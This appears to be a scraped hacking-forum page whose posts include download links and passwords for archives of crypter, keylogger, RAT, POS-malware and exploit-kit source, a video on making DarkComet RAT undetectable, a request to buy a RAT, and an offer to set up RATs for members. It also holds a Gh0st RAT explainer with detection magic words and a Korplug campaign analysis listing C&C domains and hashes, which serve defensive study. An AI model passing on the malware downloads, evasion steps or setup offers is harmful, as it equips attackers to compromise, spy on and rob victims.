Matrix Crypter DR True Crypter DW Crypter DYnAsTYCrypTeR UsG Evil Crypter v1 Fire Crypter Fly Crypter Indetectables Crypter m3m0s Crypter v2.0 Niller Crypter Njw0rm rat v3.5 NT Crypter v2 OhShin Crypter Open crypter Peacefull Crypter Poly Crypter Polymorphic crypter ProCrypter - Stubgen Rainerstoff Crypter redix crypter Relapse Private VB6 Crypter Royal crypter Runtime Crypter Schwarze Sonne crypter SkuLLByte Crypter Sotpot Simple Crypter Strong Crypt TNT Crypter Tughack crypter VB Crypter VBCrypto White-Crypt White Crypter Size: 16.43 MB Download: [url=http://speedy.sh/ZAC8X/Crypters-Source.zip]Crypters-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: d27b9bc54ec1d64bb098b93dc0a2f1ac9d6739e1 ====================== DDoS-Tools-Source ATTBooter DDoS UDP-Tunnel Size: 6.09 MB Download: [url]http://speedy.sh/hezFt/DDoS-Tools-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: d55c1bd0bc74c83eb8a83ae1d364550b409d88f1 ====================== Exploit-Kits-Source blackhole102 BleedingLife2 Crimepack3.1.3 eleonorev1 1.4.4 firepack Fragus BlacK ice-pack-3 Phoenix2.5 RIG sakura Sava Exploits Pack Size: 40.7 MB Download: [url]http://speedy.sh/Exny4/Exploit-Kits-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: d66bad2a12c58695b0af23ae7a04a4700b5869c2 ====================== Keylogger-Source basic keylogger source Ejemplo keylogger Keylog Keylogger Keylogger Keylogger 2 Keylogger by Kyzer23 Keylogger C Keylogger C 1 Keylogger C 2 Keylogger C 3 Keylogger Cpp Keylogger FTP Sharp Keyloger v1.0 Size: 1.49 MB Download: [url]http://speedy.sh/AFrz7/Keylogger-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: e9b0d8a8aab75c67eb5a3688e74e4825937678c7 ====================== POS-Malware-Source dexter Pony 1.9 Alina POS Size: 38.59 MB Download: [url]http://speedy.sh/chj2T/POS-Malware-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: e0e73d3957486cf65c5af27781ab6d24d4052fbc ====================== RAT-Source AryanSourceRelease Blackshade FBI-RAT psyb Spy-net.2.7.beta Aero-Rat Agony Alte RAT Armageddon RAT BioNukE RAT Black Dream RAT BlueRAT Crypter Breaksoft RAT Ciccio RAT derSphear RAT Error 404 RAT Evoloution RAT F0xit 0.1 Fasito RAT FearRAT gh0st3.6 src HandleX RAT Heat RAT LocustPEA Messiah v2.0 RAT Minimo RAT Monk RAT Omega v1.1 RAT ProAgent V1.21 source Rat-b RAT Phillipp RAT Remote Administration Tool Storm v1.0 RAT Size: 113.45 MB Download: [url]http://speedy.sh/wc346/RAT-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 9294863ce7833fa8857fedba4915a9aea9b14dc5 ==============================================
  8. This video demonstrates how to make a darkcomet rat undetectable. P.S. these are the names of tools needed for it to work: [C#] Source Code Generator V4.0 Final DeepSea Obfuscator.v4.0.1.16.full DNGuard HVM.Enterprise 3.60 cracked-SND DarkComet Version 5.3.1 Microsoft visual studio
  9. In this article series, we will learn about one of the most predominant malware, named Gh0st RAT, whose source code is dated back to 2001 but it is still relevant today. In this article series, we will learn what exactly is Gh0st RAT, all its variants, how it works, its characteristics, etc. What is Gh0st RAT? Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth. Gh0st RAT capabilities I think that before I delve into more technical details of Gh0st RAT, let us take a brief look at the capabilities or reach of Gh0st RAT. Below is a list of Gh0st RAT capabilities. Gh0st RAT can: Take full control of the remote screen on the infected bot. Provide real time as well as offline keystroke logging. Provide live feed of webcam, microphone of infected host. Download remote binaries on the infected remote host. Take control of remote shutdown and reboot of host. Disable infected computer remote pointer and keyboard input. Enter into shell of remote infected host with full control. Provide a list of all the active processes. Clear all existing SSDT of all existing hooks. Gh0st RAT Components This section will throw light on both at user and kernel level binaries of the Gh0st RAT toolset. Gh0st RAT has two main components: client and server. Controller Application: This is known as client, which is typically a Windows application that is used to track and manage Gh0st servers on remote compromised hosts. The two main functions this module serves is the management and control of Gh0st servers and the ability to create customized server install programs. Windows DLL (user level binary): The DLL is named SVCHOST.DLL. It is the Windows DLL that gets installed on a compromised host as a Windows service. This service is the server component of the Gh0st toolkit. It checks in to the Gh0st client on startup and awaits instructions. The setup and installation of this DLL as a service is done by the install program (Dropper) SERVER.EXE which we will discuss in a short while. INSTALL.EXE Dropper application is used to install SVCHOST.DLL. This is a stand-alone Windows application that contains all required code to prepare a compromised host for the installation of the Gh0st RAT server service and the launching of that service. Kernel Level Binary: This is present in the toolset with the .SYS filename RESSDT.SYS. This is a very small device driver that performs a single task: resetting the Windows System Service Dispatch Table (SSDT). This is the only kernel level binary in the toolset. It runs at system startup on the compromised host and removes all hooks in the SSDT. Install Program: This is commonly called “the dropper.” It contains the two above described binaries and performs all of the work necessary to install the Gh0st server on a host and startup the Gh0st service. Gh0st RAT Variants Since Gh0st Rat source code is available for everyone, Gh0st Rat has many versions available, as people have generally used and even modified the code to fit their purpose. Gh0st, because of its number of variants and encrypted capabilities, is hard to recognize. Most antivirus detections today are automatically generated, resulting in names thought out by machines. Quick, but containing information only machines find interesting. The most stable indicator of being faced with a Gh0stRat is its network communication. It is well documented and quite distinctive, as it always begins with a “magic word” which in its default configuration is “Gh0st” – thus Gh0st Rat. As one can imagine, the detection of the “Gh0st” keyword in the network stream is pretty easy, as tools like Network Intrusion Prevention System (NIPS) or even Wireshark magic words are easily available in the fixed length of 5 bytes. So the below key words are from the investigations guide that contains all the magic words from a Gh0st Network stream: “7hero, Adobe, B1X6Z, BEiLa, BeiJi, ByShe, FKJP3, FLYNN, FWAPR, FWKJG,GWRAT, Gh0st, GOLDt, HEART, HTTPS, HXWAN, Heart, IM007, ITore, KOBBX, KrisR, LUCKK, LURK0, LYRAT, Level, Lover, Lyyyy, MYFYB, MoZhe, MyRat, OXXMM, PCRat, QWPOT, Spidern, Tyjhu, URATU, W0LFKO, Wangz, Winds, World, X6RAT, XDAPR, Xjjhj, ag0ft, attac, cb1st, https, whmhl, xhjyk, 00000, ABCDE, apach, Assas, Blues, chevr, CHINA, cyl22, DrAgOn EXXMM,Eyes1, Gi0st, GM110, Hello, httpx, kaGni, light, LkxCq, lvxYT, Naver, NIGHT, NoNul, Origi, QQ_124971919, Snown, SocKt, Super, Sw@rd, v2010, VGTLS, wcker, Wh0vt, wings, X6M9K, xqwf7, YANGZ” The above is not an exhaustive list, and even magic keywords like “Spidern” and “W0LFKO” come with non-standard length of 5 bytes. Other irregular magic keywords like “DrAgOn” and “QQ_124971919? do not even compress their network traffic like most other Gh0st do. In the next article of this series, we will learn about Gh0st network connections, why it is difficult to control this type of attack, and what are the possible solutions for its control that can be put in place. References http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf http://www.mcafee.com/in/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf Source
  10. care este cel mai bun RAT si de unde as putea sa il cumpar/downloadez... imi puteti zice de unde as putea cumpara si un crypter bun pentru acest RAT... va raman recunoscator
  11. FULL RAT SETUP & SUPPORT 24/7 Do you want to have your own working rat but have no idea where to start? Do you need someone to setup everything for you? Do you need someone to teach you all you need to know? Do you need someone to an swell all your questions on RATs? I am a very experienced user in RATs and I am offering members of RST a Professional service to make sure you will have a working RAT in no time for almost no cost ( Not charging precisely but i welcome gifts and appreciations) General Functions ----------------------- – Access and Administrate Computers from Anywhere – Remote Customer Support – Telecommuting – Remote Access and Communication – Remote File Management – Remote System Activity Management – Password recovery tool (Chrome, Safari, IE, FF, Filezilla, Windows Live Messenger, No-IP, IDM and many more – Keylogger – Remote Shell (Command Interpreter) – Web Downloader (HTTP) – Screen Viewer – Bandwidth Limiter – Proxy Tunneling – Reverse Socks 4/5 Proxy Server – Local Applications Proxifier – Data Transferring List Of Rats --------------------- 1.Casa RAT 2.Back Orifice 3.Bandook RAT 4.Dark Comet Rat 5.Cerberus 6.Cybergate 7.Blackshades 8.Poison Ivy 10.Syndrome RAT 11.Team Viewer 12.Y3k RAT 13.Snoopy 15.5p00f3r.N$ RAT 16.NetBus 17.SpyNet 18.P. Storrie RAT 19.Turkojan Gold 20.Bifrost 21.Lost Door 22.Beast 23.Shark 24.Sub7 25.Pain RAT 26.xHacker Pro RAT 27.Seed RAT 28.Optix Pro RAT 29.Dark Moon 30.NetDevil 31.Deeper RAT 32.MiniMo RAT Contact: Send me a PM or email/chat me up on Yahoo IM: ratsetup247@yahoo.com Jabber : ratsetup247@exploit.im
  12. After taking a look at recent Korplug (PlugX) detections, we identified two larger scale campaigns employing this well-known Remote Access Trojan. This blog gives an overview of the first one, related to Afghanistan & Tajikistan. The other campaign, where the targets were a number of high-profile organizations in Russia, will be the subject of Anton Cherepanov’s presentation at the ZeroNights security conference in Moscow this week. Sometimes malware used in various attacks is unique enough to identify related incidents, which makes tracking individual botnets simpler. An example is the BlackEnergy Lite variant (also known as BlackEnergy 3) used by a group of attackers (that was then given the name Quedagh, or Sandworm) against targets in Ukraine and other countries. BlackEnergy Lite is clearly distinguishable from the numerous binaries of the more common BlackEnergy 2 also circulating in-the-wild. In other cases, attackers use more common tools for accomplishing their criminal goals. For example, the Korplug RAT (a.k.a .PlugX) is a well-known toolkit associated with Chinese APT groups and used in a large number of targeted attacks since 2012. For the past several weeks we have taken a closer look at a great number of detections of this malware in many unrelated incidents. Among these, we were able to discover several successful infections where the employed Korplug samples were connecting to the same C&C domain. DOMAIN: www.notebookhk.net Updated Date: 2013-11-12 18:03:45 Create Date: 2013-06-18 11:08:17 Registrant Name: lee stan Registrant Organization: lee stan Registrant Street: xianggangdiqu Registrant City: xianggangdiqu Registrant State: xianggang Registrant Postal Code: 796373 Registrant Country: HK Registrant Phone : +0.04375094543 Registrant Fax: +0.04375094543 Registrant Email:stanlee@gmail.com Other Korplug samples were connecting to a different domain name resolving to the same IPs as notebookhk.net: DOMAIN: www.dicemention.com Updated Date: 2013-11-12 18:05:33 Create Date: 2013-09-10 14:35:11 Registrant Name: z x Registrant Organization: z x Registrant Street: xianggangdiqu Registrant City: xianggangdiqu Registrant State: xianggang Registrant Postal Code: 123456 Registrant Country: HK Registrant Phone : +0.0126324313 Registrant Fax: +0.0126324313 Registrant Email: 123@123.com DOMAIN: www.abudlrasul.com Updated Date: 2014-10-16 14:16:27 Create Date: 2014-10-16 14:16:27 Registrant Name: gang xin Registrant Organization: gang xin Registrant Street: Argentina Argentina Registrant City: Argentina Registrant State: Argentina Registrant Postal Code: 647902 Registrant Country: AR Registrant Phone : +54.0899567089 Registrant Fax: +54.0899567089 Registrant Email: woffg89@yahoo.com Taking these C&Cs as a starting point, we were able to locate a number of victims infected through various exploit-laden spear-phishing documents and cunningly-named archives. A table with a selection of RTF documents and RAR self-extracting archives with a .SCR extension is shown below: [table=width: 500, class: grid, align: center] [tr] [td]File name[/td] [td] English translation[/td] [td]SHA1[/td] [/tr] [tr] [td]Situation Report about Afghan.doc[/td] [td][/td] [td]36119221826D0290BC23371B55A8C0E6A84718DD[/td] [/tr] [tr] [td]AGREEMENT BETWEENTHE NATO AND AFGHANISTAN ON THE STATUS OF NATO FORCES IN AFGHANISTAN.doc[/td] [td][/td] [td]A6642BC9F3425F0AB93D462002456BE231BB5646[/td] [/tr] [tr] [td]news.doc[/td] [td][/td] [td]51CDC273B5638E06906BCB700335E288807744B5[/td] [/tr] [tr] [td]???? ???????????? ?????????? ? ???????? ?????? ???????????? ??????? ?? ???? 2014 ?.scr[/td] [td]Activity plan for military units in the Volga region in July 2014[/td] [td]EA6EE9EAB546FB9F93B75DCB650AF22A95486391[/td] [/tr] [tr] [td]??????????????????????????????? ??? ?? .scr[/td] [td]Telephone directory of the Ministry of Foreign Affairs of the Kyrgyz Republic[/td] [td]D297DC7D29E42E8D37C951B0B11629051EEBE9C0[/td] [/tr] [tr] [td]? ?????? ?????????? ????????? ??????????????.scr[/td] [td]About the Center for social adaptation of servicemen[/td] [td]8E5E19EBE719EBF7F8BE4290931FFA173E658CB8[/td] [/tr] [tr] [td]???????? ??????? ??? ???.scr[/td] [td]Meeting minutes of the General Staff of the PRC[/td] [td]1F726E94B90034E7ABD148FE31EBA08774D1506F[/td] [/tr] [tr] [td]???????????? ?????? ????? ???????????.scr[/td] [td]Corrected action plan template[/td] [td]A9C627AA09B8CC50A83FF2728A3978492AEB79D8[/td] [/tr] [tr] [td]Situation Report about Afghan.scr[/td] [td][/td] [td]A9C627AA09B8CC50A83FF2728A3978492AEB79D8[/td] [/tr] [tr] [td]??????-???????????? ?????????? ? ??? ??04.10.2014.scr[/td] [td]Military and political situation in Islamic Republic of Afghanistan (IRA) on 04.10.2014[/td] [td]E32081C56F39EA14DFD1E449C28219D264D80B2F[/td] [/tr] [tr] [td]Afghan Air Force.scr[/td] [td][/td] [td]E32081C56F39EA14DFD1E449C28219D264D80B2F[/td] [/tr] [tr] [td]???? ???????????.scr[/td] [td]Action plan[/td] [td]1F726E94B90034E7ABD148FE31EBA08774D1506F[/td] [/tr] [/table] Some of the above-mentioned files also contained decoy documents: In all of the cases, three binary files were dropped (apart from decoy documents) that led to the Korplug trojan being loading into memory. exe – a legitimate executable with a Kaspersky digital signature that would load a DLL with a specific file name dll – a small DLL loader that would pass execution to the Korplug raw binary code dll.avp – raw Korplug binary The Korplug RAT is known to use this side-loading trick by abusing legitimate digitally signed executables and is a way to stay under the radar, since a trusted application with a valid signature among startup items is less likely to raise suspicion. The maliciously crafted documents are RTF files that successfully exploit the CVE-2012-0158 vulnerability in Microsoft Word. The image below shows the beginning of the CVE-2012-0158 shellcode in ASCII encoding within the document (the opcodes 60, 55, 8bec disassemble to pusha; push ebp; mov ebp, esp). Interestingly, though, the documents also contain the newer CVE-2014-1761 exploit that was extensively used in targeted attacks carried out by a number other malware families this year (including BlackEnergy, Sednit, MiniDuke, and others). However, this exploit is not implemented correctly due to a wrong file offset in the 1st stage shellcode. Below we see the disassembly of the 1st stage shellcode where it checks the presence of the tag “p!11” marking the beginning of the 2nd stage shellcode and loads it into memory. Even though the tag and 2nd stage shellcode is present in the RTF, it’s at a different offset, and thus never is loaded. Sophos’ Gabor Szappanos gives a possible explanation how these malformed samples may have come into existence. ESET LiveGrid telemetry indicates that the attacks against these targets have been going on since at least June 2014 and continue through today. We were able to pinpoint the targets to residents of the following countries: Afghanistan Tajikistan Russia Kyrgyzstan Kazakhstan From the topics of the files used to spread the malware, as well as from the affected targets, it appears that the attackers are interested in gathering intelligence related to Afghan, Tajik and Russian military and diplomatic subjects. Interestingly, most of the affected victims have another thing in common – a number of other RATs, file stealing trojans or keyloggers were detected on their systems on top of the Korplug RAT detection. One of these ‘alternative RATs’ was connecting to a domain also used by the Korplug samples. Since the functionality of these tools was partly overlapping with that of Korplug, it left us wondering whether the attackers were just experimenting with different RATs or were they supplementing some functionality that they were unable to accomplish. Additional information about two malware families that were most often found accompanying Korplug infections is given below. Alternative Malware #1: DarkStRat A curious Remote Access Trojan, as research points to a Chinese connection but the commands it listens to are in Spanish (translation in English): CERRAR (close) DESINSTALAR (uninstall) SERVIDOR (server) INFO MAININFO PING REBOOT POWEROFF PROC KILLPROC VERUNIDADES (see units) LISTARARCHIVOS (list files) EXEC DELFILE DELFOLDER RENAME MKDIR CAMBIOID (change ID) GETFILE/SENDFILE/RESUMETRANSFER SHELL SERVICIOSLISTAR (list service) INICIARSERVICIO (start service) DETENERSERVICIO (stop service) BORRARSERVICIO (erase service) INSTALARSERVICIO (install service) The malware can manage processes and services on the infected machine, transfer files to and from the C&C server, run shell commands, and so on. It is written in Delphi and connects to www.dicemention.com. Some samples contain a digital signature by “Nanning weiwu Technology co.,ltd”. Alternative Malware #2: File Stealer This malware, written in C, and contains several functions for harvesting files off the victim’s hard drive according to criteria set in the configuration file. Apart from doing a recursive sweep of all logical fixed and remote drives, it also continually monitors any attached removable media or network shares by listening to DBT_DEVICEARRIVAL events. In addition to collecting files, the malware attempts to gather saved passwords, history of visited URLs, account information and proxy information from the following applications: Microsoft Messenger Microsoft Outlook Microsoft Internet Explorer Mozilla Firefox The C&C domains used by this malware are: newvinta.com worksware.net Some samples of this file stealer detected in these campaigns also contain the signature by “Nanning weiwu Technology co.,ltd” – another indicator that the infections are related. List of SHA1 hashes: Korplug: 5DFA79EB89B3A8DDBC55252BD330D04D285F9189 095550E3F0E5D24A59ADD9390E6E17120039355E 5D760403108BDCDCE5C22403387E89EDC2694860 05BFE122F207DF7806EB5E4CE69D3AEC26D74190 548577598A670FFD7770F01B8C8EEFF853C222C7 530D26A9BEEDCCED0C36C54C1BF3CDA28D2B6E62 F6CB6DB20AA8F17769095042790AEB60EECD58B0 EF17B7EC3111949CBDBDEB5E0E15BD2C6E90358F 17CA3BBDDEF164E6493F32C952002E34C55A74F2 973EA910EA3734E45FDE304F20AB6CF067456551 47D78FBFB2EFC3AB9DDC653A0F03D560D972BF67 0B5A7E49987EF2C320864CF205B7048F7032300D E81E0F416752B336396294D24E639AE86D9C6BAA E930D3A2E6B2FFDC7052D7E18F51BD5A765BDB90 Alternative Malware #1: FDD41EB3CBB631F38AC415347E25926E3E3F09B6 457F4FFA2FE1CACFEA53F8F5FF72C3FA61939CCD 5B6D654EB16FC84A212ACF7D5A05A8E8A642CE20 7D59B19BD56E1D2C742C39A2ABA9AC34F6BC58D4 D7D130B8CC9BEA51143F28820F08068521763494 01B4B92D5839ECF3130F5C69652295FE4F2DA0C5 02C38EC1C67098E1F6854D1125D3AED6268540DE Alternative Malware #2: 3A7FB6E819EEC52111693219E604239BD25629E9 BF77D0BA7F3E60B45BD0801979B12BEA703B227B 55EF67AFA2EC2F260B046A901868C48A76BC7B72 A29F64CD7B78E51D0C9FDFBDCBC57CED43A157B2 34754E8B410C9480E1ADFB31A4AA72419056B622 17A2F18C9CCAAA714FD31BE2DE0BC62B2C310D8F 6D99ACEA8323B8797560F7284607DB08ECA616D8 1884A05409C7EF877E0E1AAAEC6BB9D59E065D7C 1FC6FB0D35DCD0517C82ADAEF1A85FFE2AFAB4EE 5860C99E5065A414C91F51B9E8B779D10F40ADC4 7950D5B57FA651CA6FA9180E39B6E8CC1E65B746 Research by: Anton Cherepanov Via Korplug military targeted attacks: Afghanistan & Tajikistan
×
×
  • Create New...